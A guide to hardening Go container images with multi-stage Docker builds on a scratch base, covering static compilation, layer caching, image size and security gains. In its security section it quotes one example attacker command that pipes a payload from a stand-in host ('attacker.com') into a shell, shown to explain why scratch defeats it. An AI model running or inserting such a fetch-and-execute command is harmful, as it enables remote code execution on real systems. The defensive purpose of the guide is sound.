Multi-Stage Docker Builds with Scratch: Maximum Efficiency, Minimum Attack Surface
Most Docker images ship hundreds of megabytes of operating system you never asked for. Package managers, shells, utilities, shared libraries — all sitting there doing nothing except expanding your attack surface. There is a better way.
This guide breaks down a real-world Dockerfile from the K3s Node Info HTTP Server project and explains exactly why it produces an image that is both extremely small and extremely hardened.
The Dockerfile
FROM golang:1.22-alpine AS builder
WORKDIR /app
COPY go.mod .
RUN go mod download
COPY main.go .
RUN CGO_ENABLED=0 GOOS=linux go build -o server
FROM scratch
WORKDIR /
COPY --from=builder /app/server /server
EXPOSE 8080
ENTRYPOINT ["/server"]
That is the entire thing. Every line is intentional. Let's walk through what makes it work.
Multi-stage builds
A multi-stage build uses more than one FROM instruction. Each FROM starts a new stage with its own filesystem. Only what you explicitly COPY --from= into the final stage ends up in the image you ship.
┌──────────────────────────────┐
│ Stage 1: builder             │
│ golang:1.22-alpine (~250MB)  │
│  - Go toolchain              │
│  - Source code               │
│  - Dependencies              │
│  - Compiled binary  ← this   │
└──────────┬───────────────────┘
           │ COPY --from=builder
           ▼
┌──────────────────────────────┐
│ Stage 2: final image         │
│ scratch (0 bytes)            │
│  - /server binary (~5-10MB)  │
│  - Nothing else              │
└──────────────────────────────┘
The Go toolchain, the Alpine packages, the source code, and the module cache all stay behind in the builder stage. None of it is included in the final image. The builder's layers may linger in the local build cache to speed up later builds, but they are never part of the image you push or deploy.
Why this matters
Without multi-stage builds you have two bad options:
- Ship the toolchain: your image includes the entire Go SDK, hundreds of megabytes of binaries you will never run in production.
- Build outside Docker: you compile on your host and `COPY` the binary in. This breaks reproducibility and ties your CI pipeline to a specific OS and Go version.
Multi-stage gives you the best of both worlds: a reproducible build environment that produces a minimal output.
Why scratch
scratch is Docker's empty base. It contains nothing: no shell, no libc, no /etc/passwd, no package manager. It is not an image you can pull or list; it is a reserved name that tells the builder to start from an empty filesystem.
docker pull scratch
# Error response from daemon: 'scratch' is a reserved name
When you FROM scratch, your final image contains only the files you copy in. In this case that is a single binary: /server.
What scratch does not have
| Missing | Security implication |
|---|---|
| Shell (`/bin/sh`) | An attacker who gets code execution cannot drop into a shell |
| Package manager | No apt-get install or apk add to pull in tools |
| libc / shared libs | No dynamic library hijacking via LD_PRELOAD |
| `/etc/passwd` | No named user accounts to impersonate or escalate through (the process still runs as UID 0 unless you set `USER`) |
| Utilities (`curl`, `wget`, `nc`) | No built-in tools for data exfiltration or lateral movement |
| `/tmp` directory | No conventional temp directory for staging payloads (run with `--read-only` to make the whole root filesystem unwritable) |
Every one of those missing components is a door that does not exist. You cannot exploit what is not there.
Image size comparison
| Base image | Approximate final size |
|---|---|
| `ubuntu:22.04` | ~77 MB + your binary |
| `debian:bookworm-slim` | ~74 MB + your binary |
| `alpine:3.19` | ~7 MB + your binary |
| `scratch` | Your binary only (~5-10 MB) |
With a 5-10 MB binary, a scratch-based Go image comes out roughly 9-16x smaller than the same binary on Ubuntu.
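The ratio depends heavily on how large the binary itself is, so it can help to work the arithmetic through. The following is a small sketch that uses the approximate base sizes from the table above; the helper name `sizeRatio` is made up for illustration, and the figures are estimates rather than measurements.

```go
package main

import "fmt"

// sizeRatio reports how many times larger an image built on a base of
// baseMB is than the same binary shipped alone on scratch (sizes in MB).
func sizeRatio(baseMB, binaryMB float64) float64 {
	return (baseMB + binaryMB) / binaryMB
}

func main() {
	// Approximate base image sizes taken from the comparison table.
	bases := []struct {
		name string
		mb   float64
	}{
		{"ubuntu:22.04", 77},
		{"debian:bookworm-slim", 74},
		{"alpine:3.19", 7},
	}
	// The two ends of the 5-10 MB binary range.
	for _, binaryMB := range []float64{5, 10} {
		for _, b := range bases {
			fmt.Printf("%-22s with %2.0f MB binary: %.1fx the scratch image\n",
				b.name, binaryMB, sizeRatio(b.mb, binaryMB))
		}
	}
}
```

The smaller the binary, the more the base image dominates: on Ubuntu a 5 MB binary gives a ratio of about 16, while a 10 MB binary gives about 9.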
Static compilation with CGO_ENABLED=0
This is the line that makes scratch possible:
RUN CGO_ENABLED=0 GOOS=linux go build -o server
CGO_ENABLED=0
By default, when a C toolchain is available, Go's net and os/user packages use cgo to call into the system's C library (libc). That produces a dynamically linked binary that requires shared libraries at runtime, libraries that scratch does not have.
Setting CGO_ENABLED=0 tells the Go toolchain to use the pure-Go implementations instead. The result is a statically linked binary with no external library dependencies. Setting it explicitly also keeps the result the same whether or not the builder image happens to ship a C compiler.
# With CGO_ENABLED=1 (default):
ldd server
# linux-vdso.so.1
# libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6
# ...
# With CGO_ENABLED=0:
ldd server
# not a dynamic executable
A statically compiled binary runs on any Linux host of the same CPU architecture, including on an empty filesystem.
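Besides running ldd, a Go binary can report how it was built, because the toolchain embeds its build settings. The sketch below reads the CGO_ENABLED setting through `runtime/debug`; the `linkage` helper and its wording are illustrative, not part of the project.

```go
package main

import (
	"fmt"
	"runtime/debug"
)

// linkage turns the recorded CGO_ENABLED build setting into a short verdict.
func linkage(cgoEnabled string) string {
	switch cgoEnabled {
	case "0":
		return "cgo disabled: pure-Go build"
	case "1":
		return "cgo enabled: binary may link against libc"
	default:
		return "unknown: CGO_ENABLED not recorded"
	}
}

func main() {
	info, ok := debug.ReadBuildInfo()
	if !ok {
		fmt.Println("no build info embedded in this binary")
		return
	}
	// Build settings are recorded as key/value pairs at compile time.
	cgo := ""
	for _, s := range info.Settings {
		if s.Key == "CGO_ENABLED" {
			cgo = s.Value
		}
	}
	fmt.Println(linkage(cgo))
}
```

Note that cgo being enabled does not by itself make a binary dynamic; that only happens when a package that actually uses cgo is linked in, which is why the verdict says "may".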
GOOS=linux
This explicitly sets the compilation target to Linux. Inside the golang:1.22-alpine builder the target already defaults to Linux, even when the build is started from macOS or Windows (via Docker Desktop), because the build itself runs in a Linux container. Stating it anyway documents the intent and leaves nothing to chance.
Layer caching strategy
COPY go.mod .
RUN go mod download
COPY main.go .
This ordering is deliberate. Docker caches each layer, and a layer is only rebuilt when its inputs change.
- `COPY go.mod .`: changes rarely (only when dependencies change)
- `RUN go mod download`: downloads dependencies; cached as long as `go.mod` hasn't changed
- `COPY main.go .`: changes frequently (every code edit)
If you only change main.go, Docker reuses the cached dependency layer and skips the download entirely. On a project with many dependencies this saves minutes per build.
If you did it the naive way:
# Bad: any change to source code invalidates the dependency cache
COPY . .
RUN go mod download && go build -o server
Every code change would re-download every dependency. The two-step approach keeps builds fast during development.
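To see why the ordering matters, it can help to model the cache as a chain of hashes: each layer's key depends on its parent's key, the instruction, and the content it copies. The sketch below is a deliberately simplified model, not Docker's actual cache implementation, and the names `step`, `cacheKeys`, `stale`, `split`, and `naive` are invented for this example.

```go
package main

import (
	"crypto/sha256"
	"fmt"
)

// step is one Dockerfile instruction plus the content of whatever it copies.
type step struct {
	instruction string
	input       string // copied file content; empty for RUN steps
}

// cacheKeys chains a hash through the steps, so each key depends on the
// parent key, the instruction text, and the copied content.
// This is a simplified model, not Docker's real cache logic.
func cacheKeys(steps []step) []string {
	keys := make([]string, len(steps))
	parent := ""
	for i, s := range steps {
		sum := sha256.Sum256([]byte(parent + "|" + s.instruction + "|" + s.input))
		parent = fmt.Sprintf("%x", sum)
		keys[i] = parent
	}
	return keys
}

// stale lists the instructions whose cache key differs between two builds
// of the same Dockerfile, i.e. the steps that would have to run again.
func stale(before, after []step) []string {
	old, cur := cacheKeys(before), cacheKeys(after)
	var out []string
	for i := range cur {
		if old[i] != cur[i] {
			out = append(out, after[i].instruction)
		}
	}
	return out
}

// split models the ordering used in this Dockerfile.
func split(goMod, mainGo string) []step {
	return []step{
		{"COPY go.mod .", goMod},
		{"RUN go mod download", ""},
		{"COPY main.go .", mainGo},
		{"RUN go build -o server", ""},
	}
}

// naive models the single "COPY . ." variant.
func naive(goMod, mainGo string) []step {
	return []step{
		{"COPY . .", goMod + mainGo},
		{"RUN go mod download && go build -o server", ""},
	}
}

func main() {
	// Only main.go changes between the two builds.
	fmt.Println("split:", stale(split("mod v1", "code v1"), split("mod v1", "code v2")))
	fmt.Println("naive:", stale(naive("mod v1", "code v1"), naive("mod v1", "code v2")))
}
```

In this model, the split ordering invalidates only the source copy and the build step, leaving the download step cached, while the naive ordering invalidates the step that downloads dependencies as well.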
Alpine as the builder base
FROM golang:1.22-alpine AS builder
The builder uses golang:1.22-alpine rather than the full golang:1.22 image. Alpine-based images are significantly smaller:
| Builder image | Size |
|---|---|
| `golang:1.22` | ~800 MB |
| `golang:1.22-alpine` | ~250 MB |
This does not affect the final image (the builder is discarded), but it reduces:
- Pull time in CI/CD — less data to download on every pipeline run
- Disk usage — especially on build servers running many jobs
- Build startup time — smaller layers decompress faster
Since the final binary is compiled without cgo, Alpine's musl libc never ends up in it, so using Alpine as the builder has no practical downside here.
ENTRYPOINT vs CMD
ENTRYPOINT ["/server"]
The Dockerfile uses ENTRYPOINT in exec form (JSON array), not CMD. This matters for two reasons:
- Exec form runs the binary directly as PID 1, with no shell wrapper and no `/bin/sh -c`. Since scratch has no shell, `ENTRYPOINT /server` (shell form) would fail. The exec form avoids this entirely.
- Signal handling: when the binary is PID 1, it receives `SIGTERM` directly from Docker during container stop. This allows the application to handle graceful shutdown without relying on a shell to forward signals.
Security analysis
Zero CVEs by default
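Container vulnerability scanners (Trivy, Grype, Snyk) work primarily by matching installed OS packages against known vulnerability databases. A scratch image has no OS packages, so that whole category of findings is empty, not because vulnerabilities are hidden, but because the packages genuinely do not exist. Scanners that also inspect Go binaries can still report issues in the Go standard library or in your module dependencies, so a clean result is likely with a current toolchain but not guaranteed.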
trivy image your-scratch-image:latest
# Total: 0 (UNKNOWN: 0, LOW: 0, MEDIUM: 0, HIGH: 0, CRITICAL: 0)
Compare that to a typical Ubuntu-based image, which can carry dozens of known CVEs from packages you never use.
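One nuance is worth seeing concretely: a Go binary embeds its toolchain version and module list, and scanners such as Trivy and Grype can read that metadata even when the image has no OS packages. The sketch below prints the same information using the standard `debug/buildinfo` package. The `moduleLine` helper is illustrative; pass the path to a Go binary as the first argument, or run it with no arguments to inspect itself.

```go
package main

import (
	"debug/buildinfo"
	"fmt"
	"os"
)

// moduleLine formats a module as path@version, the pair a scanner would
// match against a vulnerability database.
func moduleLine(path, version string) string {
	if version == "" {
		version = "(unknown)"
	}
	return path + "@" + version
}

func main() {
	// Inspect the binary named on the command line, or this program itself.
	target, err := os.Executable()
	if len(os.Args) > 1 {
		target, err = os.Args[1], nil
	}
	if err != nil {
		fmt.Println("cannot locate binary:", err)
		return
	}

	info, err := buildinfo.ReadFile(target)
	if err != nil {
		fmt.Println("no Go build info:", err)
		return
	}
	fmt.Println("toolchain:", info.GoVersion) // identifies the standard library version
	for _, dep := range info.Deps {
		fmt.Println("module:   ", moduleLine(dep.Path, dep.Version))
	}
}
```

Keeping the Go toolchain and module versions current is therefore still part of keeping a scratch image clean.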
No shell access
If an attacker exploits a vulnerability in your Go application and achieves remote code execution, the first thing they typically do is spawn a shell:
/bin/sh -c "curl attacker.com/payload | sh"
On scratch, this fails immediately. There is no /bin/sh to launch and no curl to fetch the payload. The attacker's standard playbook is dead on arrival.
No privilege escalation path
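With no su, no sudo, no user database, and no setuid binaries, the paths to privilege escalation that work on traditional images do not exist here. One caveat: this Dockerfile sets no USER, so the server runs as UID 0 inside the container, and the root filesystem is writable unless the container is started with --read-only. Adding a numeric USER instruction and a read-only filesystem closes that gap.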
No supply chain bloat
Every package in a base image is a dependency you did not write and may not audit. Each one can introduce vulnerabilities, and each one needs patching. With scratch, your supply chain is:
- The Go standard library (reviewed, well-tested)
- Your application code
- Your `go.mod` dependencies
That is it. No hidden transitive OS dependencies.
When scratch is not the right choice
Scratch is not universally applicable. It works here because Go produces self-contained static binaries. Consider alternatives when:
- Your language needs a runtime: Python, Node.js, Java, and Ruby all need interpreters or VMs. Use distroless or Alpine instead.
- You need TLS with CA certificates: scratch has no `/etc/ssl/certs`, so outbound HTTPS calls cannot verify certificates. You can `COPY` a CA bundle in, or use Google's distroless images, which include certificates.
- You need timezone data: Go's `time` package needs tzdata for `time.LoadLocation()`. You can embed it at build time with `-tags timetzdata` or copy `/usr/share/zoneinfo` from the builder (installing the tzdata package there first if it is missing).
- You need debugging access: with no shell, you cannot `docker exec` a shell in the container. For debugging, build a second image variant using `alpine` as the base.
For this specific use case — a simple HTTP server written in Go — scratch is the ideal choice.
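For the timezone case, Go also offers a source-level equivalent of the timetzdata build tag: a blank import of the standard `time/tzdata` package, which embeds the zone database in the binary. The sketch below assumes that approach; the `utcOffset` helper and the chosen zone are only for illustration.

```go
package main

import (
	"fmt"
	"time"
	_ "time/tzdata" // embeds the zone database; adds roughly 450 KB to the binary
)

// utcOffset returns the offset from UTC, in seconds, that the named zone
// observes at the given Unix time.
func utcOffset(zone string, unix int64) (int, error) {
	loc, err := time.LoadLocation(zone)
	if err != nil {
		return 0, err
	}
	_, offset := time.Unix(unix, 0).In(loc).Zone()
	return offset, nil
}

func main() {
	// 1704067200 is 2024-01-01 00:00:00 UTC.
	offset, err := utcOffset("Asia/Tokyo", 1704067200)
	if err != nil {
		fmt.Println("zone lookup failed:", err)
		return
	}
	fmt.Println("Asia/Tokyo offset in seconds:", offset)
}
```

With the import in place, zone lookups work on scratch without any files under /usr/share/zoneinfo; without it, the same call would return an error there.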
Building and running
git clone https://github.com/InfraFort/K3s-Node-Info-HTTP-Server.git
cd K3s-Node-Info-HTTP-Server
docker build -t node-info-server .
docker run -p 8080:8080 node-info-server
Check the image size:
docker images node-info-server
# REPOSITORY TAG IMAGE ID CREATED SIZE
# node-info-server latest ... ... ~6 MB
Approximately 6 MB for a fully functional HTTP server. No wasted space, no unnecessary risk.
Summary
Every design choice in this Dockerfile serves a purpose:
| Decision | Benefit |
|---|---|
| Multi-stage build | Build tools never reach production |
| `scratch` base | No OS userland, minimal attack surface |
| `CGO_ENABLED=0` | Static binary, no libc dependency |
| `GOOS=linux` | Explicit target, reproducible across platforms |
| Separate `go.mod` copy | Fast rebuilds via layer caching |
| `golang:1.22-alpine` builder | Smaller builder, faster CI pulls |
| `ENTRYPOINT` exec form | Direct PID 1, proper signal handling, no shell needed |
The result is a container image that is small enough to deploy anywhere, fast enough to start in milliseconds, and hardened enough that most standard attack vectors do not apply. If your application can compile to a static binary, this is the pattern to follow.